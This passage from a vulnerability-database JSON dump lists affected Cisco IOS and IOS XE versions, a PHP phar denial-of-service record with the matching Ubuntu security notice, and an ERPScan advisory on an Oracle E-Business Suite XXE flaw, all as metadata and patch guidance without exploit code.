"15.6(3)M2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M2a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M3a", "operator": "eq", "name": "cisco ios"}, {"version": "15.7(3)M", "operator": "eq", "name": "cisco ios"}, {"version": "15.7(3)M0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.3(3)JK6", "operator": "eq", "name": "cisco ios"}, {"version": "3.14.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.14.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.14.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.14.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.14.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.1cS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.0aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.1aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.2aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.0bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.0cS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.2bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.3aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4gS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.5S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4cS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4dS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4eS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.6S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.5aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.5bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.6bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.1aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.1.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.1.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.1.3", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.2.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.2.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.3", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.1a", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.4", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.5", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.5b", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.4.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.4.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5.1a", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5.1b", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.0aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.0SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1aSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1gSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1bSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1cSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.2SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1hSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.2aSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1iSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.3SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.3aSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.6.1", "operator": "eq", "name": "cisco ios xe software"}], "vendorCvss": {"score": "9.8", "severity": "critical"}, "_object_type": "robots.models.cisco.CiscoBulletin", "_object_types": ["robots.models.cisco.CiscoBulletin", "robots.models.base.Bulletin"]}], "securityvulns": [{"id": "SECURITYVULNS:VULN:14753", "bulletinFamily": "software", "title": "PHP security vulnerabilities", "description": "PHAR extension DoS.", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32651"], "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "type": "securityvulns", "lastseen": "2021-06-08T19:08:49", "history": [{"bulletin": {"affectedSoftware": [{"name": "PHP", "operator": "eq", "version": "5.6"}], "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "PHAR extension DoS.", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-08-31T11:10:03", "references": [{"idList": ["ALAS-2015-602", "ALAS-2015-601"], "type": "amazon"}, {"idList": ["CVE-2015-7803", "CVE-2015-7804"], "type": "cve"}, {"idList": ["H1:103990", "H1:104008"], "type": "hackerone"}, {"idList": ["SECURITYVULNS:DOC:32651"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310806649", "OPENVAS:1361412562310806648", "OPENVAS:703380", "OPENVAS:1361412562310120520", "OPENVAS:1361412562310842508", "OPENVAS:1361412562310807000", "OPENVAS:1361412562311220201747", "OPENVAS:1361412562310703380", "OPENVAS:1361412562310120396", "OPENVAS:1361412562311220191984"], "type": "openvas"}, {"idList": ["RHSA-2016:0457"], "type": "redhat"}, {"idList": ["SUSE-SU-2016:1145-1", "SUSE-SU-2016:1638-1", "SUSE-SU-2016:1581-1"], "type": "suse"}, {"idList": ["DEBIAN:DSA-3380-1:F94D6", "DEBIAN:DLA-341-1:DA682"], "type": "debian"}, {"idList": ["USN-2786-1"], "type": "ubuntu"}, {"idList": ["SSA-2016-034-04"], "type": "slackware"}, {"idList": ["GLSA-201606-10"], "type": "gentoo"}, {"idList": ["ALA_ALAS-2015-602.NASL", "FREEBSD_PKG_C1DA8B756AEF11E59909002590263BF5.NASL", "UBUNTU_USN-2786-1.NASL", "PHP_5_6_14.NASL", "SUSE_SU-2016-0284-1.NASL", "PHP_5_5_30.NASL", "SLACKWARE_SSA_2016-034-04.NASL", "OPENSUSE-2016-100.NASL", "ALA_ALAS-2015-601.NASL", "DEBIAN_DSA-3380.NASL"], "type": "nessus"}, {"idList": ["C1DA8B75-6AEF-11E5-9909-002590263BF5"], "type": "freebsd"}, {"idList": ["F5:K17503", "SOL17503"], "type": "f5"}, {"idList": ["CLSA-2020:1605798462"], "type": "cloudlinux"}], "rev": 2}, "score": {"modified": "2018-08-31T11:10:03", "rev": 2, "value": 7.4, "vector": "NONE"}}, "hash": "5bebcb6b83df2b42d069178c1e9ea73c038f8703bc95cf2b81c683a8d0d17ff6", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "94aee96d0a33ff770af1ab8e308073f0", "key": "cvelist"}, {"hash": "c514412540c1e967450f03283e4ed180", "key": "references"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "5c799165d68e636bd0726587ae899c0d", "key": "description"}, {"hash": "6d2dcaed858380d54d5782ad38c55586", "key": "affectedSoftware"}, {"hash": "2c5cca82a8670da097919f6160833daf", "key": "reporter"}, {"hash": "b3b8db0e3c7acd6c3190db6f8e88e96b", "key": "href"}, {"hash": "d8f38bedae5c73d95ff296ba2bd86a44", "key": "modified"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "3a18a828bc11b79a70839be146b3b5a3", "key": "title"}, {"hash": "d54751dd75af2ea0147b462b3e001cd0", "key": "type"}, {"hash": "d8f38bedae5c73d95ff296ba2bd86a44", "key": "published"}], "history": [], "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "id": "SECURITYVULNS:VULN:14753", "immutableFields": [], "lastseen": "2018-08-31T11:10:03", "modified": "2015-11-02T00:00:00", "objectVersion": "1.5", "published": "2015-11-02T00:00:00", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32651"], "reporter": "BUGTRAQ", "title": "PHP security vulnerabilities", "type": "securityvulns", "viewCount": 212}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-08-31T11:10:03"}], "edition": 2, "hashmap": [{"key": "affectedSoftware", "hash": "1858c8bfb7eb8aace48fa57059397c29"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "94aee96d0a33ff770af1ab8e308073f0"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "5c799165d68e636bd0726587ae899c0d"}, {"key": "href", "hash": "b3b8db0e3c7acd6c3190db6f8e88e96b"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "c514412540c1e967450f03283e4ed180"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "3a18a828bc11b79a70839be146b3b5a3"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "8859a40c26baff900b73dab92cbb6fd72e9b8dcbbd9acc6d613b18d55563796e", "viewCount": 222, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["F5:K17503", "SOL17503"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-7803", "UB:CVE-2015-7804"]}, {"type": "cve", "idList": ["CVE-2015-7803", "CVE-2015-7804"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220191984", "OPENVAS:1361412562311220201747", "OPENVAS:1361412562310806649", "OPENVAS:1361412562310120520", "OPENVAS:1361412562311220192438", "OPENVAS:1361412562310703380", "OPENVAS:703380", "OPENVAS:1361412562311220192649", "OPENVAS:1361412562310807000", "OPENVAS:1361412562310806648", "OPENVAS:1361412562310120396", "OPENVAS:1361412562310842508"]}, {"type": "nessus", "idList": ["ALA_ALAS-2015-602.NASL", "DEBIAN_DSA-3380.NASL", "EULEROS_SA-2019-2649.NASL", "PHP_5_5_30.NASL", "UBUNTU_USN-2786-1.NASL", "OPENSUSE-2016-100.NASL", "SUSE_SU-2016-1581-1.NASL", "FREEBSD_PKG_C1DA8B756AEF11E59909002590263BF5.NASL", "OPENSUSE-2016-157.NASL", "EULEROS_SA-2019-1984.NASL", "MACOSX_SECUPD2015-008.NASL", "9325.PRM", "SLACKWARE_SSA_2016-034-04.NASL", "EULEROS_SA-2019-2438.NASL", "SUSE_SU-2016-1638-1.NASL", "WEB_APPLICATION_SCANNING_98806", "GENTOO_GLSA-201606-10.NASL", "8956.PRM", "SUSE_SU-2016-0284-1.NASL", "MACOSX_10_11_2.NASL", "SUSE_SU-2016-1145-1.NASL", "PHP_5_6_14.NASL", "DEBIAN_DLA-341.NASL", "ALA_ALAS-2015-601.NASL", "PFSENSE_SA-15_08.NASL", "EULEROS_SA-2020-1747.NASL"]}, {"type": "freebsd", "idList": ["C1DA8B75-6AEF-11E5-9909-002590263BF5"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32651"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3380-1:F94D6", "DEBIAN:DLA-341-1:DA682"]}, {"type": "ubuntu", "idList": ["USN-2786-1"]}, {"type": "slackware", "idList": ["SSA-2016-034-04"]}, {"type": "hackerone", "idList": ["H1:104008", "H1:103990"]}, {"type": "amazon", "idList": ["ALAS-2015-602", "ALAS-2015-601"]}, {"type": "redhat", "idList": ["RHSA-2016:0457"]}, {"type": "suse", "idList": ["SUSE-SU-2016:1581-1", "SUSE-SU-2016:1145-1", "SUSE-SU-2016:1638-1"]}, {"type": "gentoo", "idList": ["GLSA-201606-10"]}, {"type": "cloudlinux", "idList": ["CLSA-2020:1605798462"]}], "modified": "2021-06-08T19:08:49", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-06-08T19:08:49", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "php", "operator": "eq", "version": "5.6"}], "immutableFields": [], "scheme": null, "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:DOC:32651", "bulletinFamily": "software", "title": "[USN-2786-1] PHP vulnerabilities", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. &#40;CVE-2015-7803, CVE-2015-7804&#41;\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "type": "securityvulns", "lastseen": "2018-08-31T11:11:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "94aee96d0a33ff770af1ab8e308073f0"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "7591a4414fab4e00d545d96f67923bfe"}, {"key": "href", "hash": "91f326dd520bc78a7e8becd3c39b6be5"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "29738b7846c783fb3a4f2a49b7c4ccd3"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "d2381bcd69ce89f633080a3b3bcd22d9c6038a3c2512d85530ef0a4ad6a45bd8", "viewCount": 181, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2018-08-31T11:11:02", "rev": 2}, "dependencies": {"references": [{"type": "f5", "idList": ["F5:K17503", "SOL17503"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-7803", "UB:CVE-2015-7804"]}, {"type": "cve", "idList": ["CVE-2015-7803", "CVE-2015-7804"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220191984", "OPENVAS:1361412562311220201747", "OPENVAS:1361412562310806649", "OPENVAS:1361412562310120520", "OPENVAS:1361412562311220192438", "OPENVAS:1361412562310703380", "OPENVAS:703380", "OPENVAS:1361412562311220192649", "OPENVAS:1361412562310807000", "OPENVAS:1361412562310806648", "OPENVAS:1361412562310120396", "OPENVAS:1361412562310842508"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3380-1:F94D6", "DEBIAN:DLA-341-1:DA682"]}, {"type": "nessus", "idList": ["ALA_ALAS-2015-602.NASL", "DEBIAN_DSA-3380.NASL", "EULEROS_SA-2019-2649.NASL", "PHP_5_5_30.NASL", "UBUNTU_USN-2786-1.NASL", "OPENSUSE-2016-100.NASL", "SUSE_SU-2016-1581-1.NASL", "FREEBSD_PKG_C1DA8B756AEF11E59909002590263BF5.NASL", "OPENSUSE-2016-157.NASL", "EULEROS_SA-2019-1984.NASL", "MACOSX_SECUPD2015-008.NASL", "9325.PRM", "SLACKWARE_SSA_2016-034-04.NASL", "EULEROS_SA-2019-2438.NASL", "SUSE_SU-2016-1638-1.NASL", "WEB_APPLICATION_SCANNING_98806", "GENTOO_GLSA-201606-10.NASL", "8956.PRM", "SUSE_SU-2016-0284-1.NASL", "MACOSX_10_11_2.NASL", "SUSE_SU-2016-1145-1.NASL", "PHP_5_6_14.NASL", "DEBIAN_DLA-341.NASL", "ALA_ALAS-2015-601.NASL", "PFSENSE_SA-15_08.NASL", "EULEROS_SA-2020-1747.NASL"]}, {"type": "ubuntu", "idList": ["USN-2786-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14753"]}, {"type": "freebsd", "idList": ["C1DA8B75-6AEF-11E5-9909-002590263BF5"]}, {"type": "slackware", "idList": ["SSA-2016-034-04"]}, {"type": "hackerone", "idList": ["H1:104008", "H1:103990"]}, {"type": "amazon", "idList": ["ALAS-2015-602", "ALAS-2015-601"]}, {"type": "redhat", "idList": ["RHSA-2016:0457"]}, {"type": "suse", "idList": ["SUSE-SU-2016:1581-1", "SUSE-SU-2016:1145-1", "SUSE-SU-2016:1638-1"]}, {"type": "gentoo", "idList": ["GLSA-201606-10"]}, {"type": "cloudlinux", "idList": ["CLSA-2020:1605798462"]}], "modified": "2018-08-31T11:11:02", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:DOC:32654", "bulletinFamily": "software", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Medium &#40;M&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability Partial &#40;P&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1&#41; An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2&#41; An attacker can perform a DoS attack &#40;for example, XML Entity Expansion&#41;.\r\n3&#41; An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-4849"], "type": "securityvulns", "lastseen": "2018-08-31T11:11:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "05f33ecfa6c5da775ada7be0946e9c35"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "e069b6a0eb846de58d51f6f1caccd76e"}, {"key": "href", "hash": "a034a18d00b9b8f4a3448812c0519f69"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "c9c62536a7dbd3fac9ecbf649050cab1"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "c4015e5d0067bf08940e133c4477451e433581d60a4c9b7745f8b69fced90c4c", "viewCount": 168, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2018-08-31T11:11:02", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-4849"]}, {"type": "erpscan", "idList": ["ERPSCAN-15-029"]}, {"type": "nessus", "idList": ["ORACLE_E-BUSINESS_CPU_OCT_2015.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14755"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2015-2367953", "ORACLE:CPUOCT2015"]}], "modified": "2018-08-31T11:11:02", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:DOC:32658", "bulletinFamily": "software", "title": "[ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability", "description": "\r\n\r\n1. 